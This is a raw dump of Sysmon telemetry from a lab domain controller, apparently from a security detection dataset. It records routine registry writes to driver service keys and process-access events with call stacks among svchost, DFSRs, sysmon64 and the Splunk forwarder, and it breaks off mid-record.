12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\CountDWORD (0x00000001) 13241300x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.752{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xennet\Enum\0XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0 13241300x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.737{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xenvif\Addresses\002:8d:48:bf:78:a4 13241300x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.721{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.721{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.721{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.721{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.549{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Parameters\WppRecorder_TraceGuid{09281f1f-f66e-485a-99a2-91638f782c49} 13241300x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.534{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\i8042prt\Parameters\WppRecorder_TraceGuid{7ffb8eb8-2c86-45d6-a7c5-c023d9c070c1} 13241300x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.409{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.409{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.409{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMajorVersionDWORD (0x00000001) 13241300x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMinorVersionDWORD (0x00000028) 13241300x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.362{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.190{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\cdrom\Parameters\WppRecorder_TraceGuid{a4196372-c3c4-42d5-87bf-7edb2e9bcc27} 13241300x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\CountDWORD (0x00000001) 13241300x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 13241300x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\CountDWORD (0x00000001) 13241300x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:39.018{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 434400x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local2021-03-31 12:01:01.408Started13.014.50 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.995{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.995{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.994{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.994{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.994{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.988{266CAFBE-647D-6064-3100-00000000AE01}26723236C:\Windows\system32\DFSRs.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d847d|C:\Windows\system32\DFSRs.exe+c1bd|C:\Windows\system32\DFSRs.exe+51c1|C:\Windows\system32\DFSRs.exe+73b2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.984{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4B00-00000000AE01}3728C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.982{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.982{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4B00-00000000AE01}3728C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.971{266CAFBE-647E-6064-4A00-00000000AE01}26123740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-647E-6064-4B00-00000000AE01}3728C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.981{266CAFBE-647E-6064-4B00-00000000AE01}3728C:\Program 